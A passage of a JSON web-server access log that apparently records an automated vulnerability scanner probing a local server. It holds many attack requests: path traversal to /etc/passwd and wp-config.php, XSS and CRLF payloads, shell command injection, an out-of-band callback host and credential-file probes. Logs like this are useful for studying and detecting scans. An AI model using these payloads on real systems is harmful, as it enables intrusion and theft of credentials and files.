"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysqldump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0d/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/serverInfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hui/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/phpmailer/phpmailer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apis/apps/v1/namespaces/default/deployments HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"{\x22test_type\x22:\x22ip\x22,\x22test_debug\x22:false,\x22ipnotify_type\x22:\x22http/get\x22,\x22ipnotify_address\x22:\x22http://ca28fg0smpvbd3qg07h0q8fm5maadakpm.oast.live\x22,\x22ipnotify_username\x22:\x22\x22,\x22ipnotify_password\x22:\x22\x22,\x22ipnotify_port\x22:\x220\x22,\x22ipnotify_content_type\x22:\x22\x22,\x22ipnotify_template\x22:\x22\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KD259j5IzEQP3BF51Y8DObAXS/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.production.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"system.listMethods","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%00/example.com/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /(download)/tmp/poc.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /neos/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.test.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git-credentials HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/install.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"{\x22query\x22:\x22# Welcome to GraphiQL\x5Cn#\x5Cn# GraphiQL is an in-browser tool for writing, validating, and\x5Cn# testing GraphQL queries.\x5Cn#\x5Cn# Type queries into this side of the screen, and you will see intelligent\x5Cn# typeaheads aware of the current GraphQL type schema and live syntax and\x5Cn# validation errors highlighted within the text.\x5Cn#\x5Cn# GraphQL queries typically start with a \x5C\x22{\x5C\x22 character. Lines that starts\x5Cn# with a # are ignored.\x5Cn#\x5Cn# An example GraphQL query might look like:\x5Cn#\x5Cn# {\x5Cn# field(arg: \x5C\x22value\x5C\x22) {\x5Cn# subField\x5Cn# }\x5Cn# }\x5Cn#\x5Cn# Keyboard shortcuts:\x5Cn#\x5Cn# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\x5Cn#\x5Cn# Run Query: Ctrl-Enter (or press the play button above)\x5Cn#\x5Cn# Auto Complete: Ctrl-Space (or just start typing)\x5Cn#\x5Cn\x5Cn{\x5Cn users {\x5Cn nodes {\x5Cn id\x5Cn name\x5Cn username\x5Cn }\x5Cn }\x5Cn}\x22,\x22variables\x22:null,\x22operationName\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1/-/graphql-explorer", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0DSet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.dev.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminlogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.034","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C%5Cexample.com/%252e%252e%252f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 